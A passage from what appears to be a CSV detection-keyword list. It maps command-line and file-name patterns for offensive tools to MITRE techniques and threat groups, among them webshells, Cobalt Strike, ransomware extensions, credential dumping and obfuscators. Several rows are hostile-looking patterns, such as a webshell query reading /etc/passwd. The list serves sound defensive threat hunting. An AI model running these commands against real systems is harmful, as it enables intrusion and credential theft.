Evasion","https://github.com/cmars/onionpipe","1","1","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","4719" "*.onion:81*",".{0,1000}\.onion\:81.{0,1000}","offensive_tool_keyword","onionpipe","onionpipe forwards ports on the local host to remote Onion addresses as Tor hidden services and vice-versa.","T1090.003 - T1573.002","TA0005 - TA0011","N/A","Black Basta","Defense Evasion","https://github.com/cmars/onionpipe","1","0","N/A","N/A","10","6","553","33","2025-04-22T16:34:56Z","2022-01-23T06:52:13Z","4720" "*.pdf.bat*",".{0,1000}\.pdf\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4721" "*.pdf.dll*",".{0,1000}\.pdf\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4722" "*.pdf.exe*",".{0,1000}\.pdf\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4723" "*.pdf.htm",".{0,1000}\.pdf\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4724" "*.pdf.iso*",".{0,1000}\.pdf\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4725" "*.pdf.jar*",".{0,1000}\.pdf\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - 
TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4726" "*.pdf.jasmin*",".{0,1000}\.pdf\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","4727" "*.pdf.js*",".{0,1000}\.pdf\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4728" "*.pdf.sfx*",".{0,1000}\.pdf\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4729" "*.pdf.vbs*",".{0,1000}\.pdf\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4730" "*.pfx -Domain * -PatchLsass*",".{0,1000}\.pfx\s\-Domain\s.{0,1000}\s\-PatchLsass.{0,1000}","offensive_tool_keyword","Invoke-RunAsWithCert","A PowerShell script to perform PKINIT authentication with the Windows API from a non domain-joined machine","T1550.003 - T1078 - T1027","TA0006 - TA0005","N/A","N/A","Lateral Movement","https://github.com/synacktiv/Invoke-RunAsWithCert","1","0","N/A","N/A","8","2","150","14","2024-05-13T08:26:56Z","2024-05-03T12:44:21Z","4731" "*.photos.123456.*",".{0,1000}\.photos\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection 
controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4732" "*.php?cmd=cat+/etc/passwd*",".{0,1000}\.php\?cmd\=cat\+\/etc\/passwd.{0,1000}","offensive_tool_keyword","webshell","A collection of webshell","T1505.003 - T1100 - T1190 - T1505.004","TA0003 - TA0011 ","N/A","N/A","Persistence","https://github.com/Peaky-XD/webshell","1","1","#linux","N/A","10","1","N/A","N/A","N/A","N/A","4733" "*.pic.123456.*",".{0,1000}\.pic\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script 
to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4734" "*.pipename_stager*",".{0,1000}\.pipename_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4735" "*.png.jasmin*",".{0,1000}\.png\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","4736" "*.pop.123456.*",".{0,1000}\.pop\.123456\..{0,1000}","offensive_tool_keyword","cobaltstrike","A script to randomize 
Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","N/A","10","10","444","87","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z","4737" "*.powerview.ldap_session*",".{0,1000}\.powerview\.ldap_session.{0,1000}","offensive_tool_keyword","powerview","PowerView.py is an alternative for the awesome original PowerView.ps1","T1046 - T1087.001 - T1016","TA0007 - TA0008 - 
TA0009","N/A","N/A","Discovery","https://github.com/aniqfakhrul/powerview.py","1","0","#content","N/A","10","7","622","66","2025-04-22T09:01:39Z","2022-06-19T16:13:04Z","4738" "*.ppt.bat*",".{0,1000}\.ppt\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4739" "*.ppt.dll*",".{0,1000}\.ppt\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4740" "*.ppt.exe*",".{0,1000}\.ppt\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4741" "*.ppt.htm*",".{0,1000}\.ppt\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4742" "*.ppt.iso*",".{0,1000}\.ppt\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4743" "*.ppt.jar*",".{0,1000}\.ppt\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4744" "*.ppt.js*",".{0,1000}\.ppt\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - 
TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4745" "*.ppt.sfx*",".{0,1000}\.ppt\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4746" "*.ppt.vbs*",".{0,1000}\.ppt\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4747" "*.pptx.bat*",".{0,1000}\.pptx\.bat.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4748" "*.pptx.dll*",".{0,1000}\.pptx\.dll.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4749" "*.pptx.exe*",".{0,1000}\.pptx\.exe.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4750" "*.pptx.htm*",".{0,1000}\.pptx\.htm.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4751" "*.pptx.iso*",".{0,1000}\.pptx\.iso.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4752" 
"*.pptx.jar*",".{0,1000}\.pptx\.jar.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4753" "*.pptx.jasmin*",".{0,1000}\.pptx\.jasmin.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","4754" "*.pptx.js*",".{0,1000}\.pptx\.js.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4755" "*.pptx.sfx*",".{0,1000}\.pptx\.sfx.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4756" "*.pptx.vbs*",".{0,1000}\.pptx\.vbs.{0,1000}","offensive_tool_keyword","_","Suspicious extensions files","T1204 - T1212 - T1562","TA0001 - TA0003 - TA0005 - TA0007 - TA0011","N/A","N/A","Phishing","N/A","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","4757" "*.PrivilegeEscalation.Exchange*",".{0,1000}\.PrivilegeEscalation\.Exchange.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","4758" "*.ps1 -Base *OU=*DC=* -Credentials * -Server *",".{0,1000}\.ps1\s\-Base\s.{0,1000}OU\=.{0,1000}DC\=.{0,1000}\s\-Credentials\s.{0,1000}\s\-Server\s.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","N/A","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","4759" "*.ps1 -dcip * -Username * -Password* -ExportToCSV *.csv -ExportToJSON *.json*",".{0,1000}\.ps1\s\-dcip\s.{0,1000}\s\-Username\s.{0,1000}\s\-Password.{0,1000}\s\-ExportToCSV\s.{0,1000}\.csv\s\-ExportToJSON\s.{0,1000}\.json.{0,1000}","offensive_tool_keyword","ExtractBitlockerKeys","A system administration or post-exploitation script to automatically extract the bitlocker recovery keys from a domain.","T1003.002 - T1039 - T1087.002","TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/p0dalirius/ExtractBitlockerKeys","1","0","N/A","N/A","10","4","368","54","2025-01-31T09:39:55Z","2023-09-19T07:28:11Z","4760" "*.ps1 -GPP -PView -Kerberoast*",".{0,1000}\.ps1\s\-GPP\s\-PView\s\-Kerberoast.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","4761" "*.ps1 -l -p * -r dns:::*",".{0,1000}\.ps1\s\-l\s\-p\s.{0,1000}\s\-r\sdns\:\:\:.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","N/A","10","10","2229","482","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z","4762" "*.ps1 -PrivEsc*",".{0,1000}\.ps1\s\-PrivEsc.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","4763" "*.ps1 -StartWebServer Powershell*",".{0,1000}\.ps1\s\-StartWebServer\sPowershell.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","4764" "*.ps1 -StartWebServer Python*",".{0,1000}\.ps1\s\-StartWebServer\sPython.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation 
tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","4765" "*.ps1 -technique BetterXencrypt*",".{0,1000}\.ps1\s\-technique\sBetterXencrypt.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","4767" "*.ps1 -technique Chameleon*",".{0,1000}\.ps1\s\-technique\sChameleon.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","4768" "*.ps1 -technique PSObfuscation*",".{0,1000}\.ps1\s\-technique\sPSObfuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","4769" "*.ps1 -technique PyFuscation*",".{0,1000}\.ps1\s\-technique\sPyFuscation.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","4770" "*.ps1 -technique ReverseB64*",".{0,1000}\.ps1\s\-technique\sReverseB64.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","N/A","9","6","559","81","2023-04-21T12:49:37Z","2021-04-13T10:22:05Z","4771" "*.ps1 -WifiPasswords 
Dump*",".{0,1000}\.ps1\s\-WifiPasswords\sDump.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","4772" "*.py -credz *.txt * ",".{0,1000}\.py\s\s\-credz\s.{0,1000}\.txt\s.{0,1000}\s","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","4773" "*.py -k * -f *.bat -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.bat\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4774" "*.py -k * -f *.docm -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.docm\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. 
along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4775" "*.py -k * -f *.docx -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.docx\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4776" "*.py -k * -f *.exe -o *.html*",".{0,1000}\.py\s\s\-k\s.{0,1000}\s\-f\s.{0,1000}\.exe\s\-o\s.{0,1000}\.html.{0,1000}","offensive_tool_keyword","EmbedInHTML","What this tool does is taking a file (any type of file). encrypt it. and embed it into an HTML file as ressource. along with an automatic download routine simulating a user clicking on the embedded ressource.","T1027 - T1566.001","TA0005 - TA0002","N/A","N/A","Phishing","https://github.com/Arno0x/EmbedInHTML","1","0","N/A","N/A","10","5","485","119","2017-09-27T13:16:06Z","2017-09-11T07:17:20Z","4777" "*.py -k * -f *.js -o 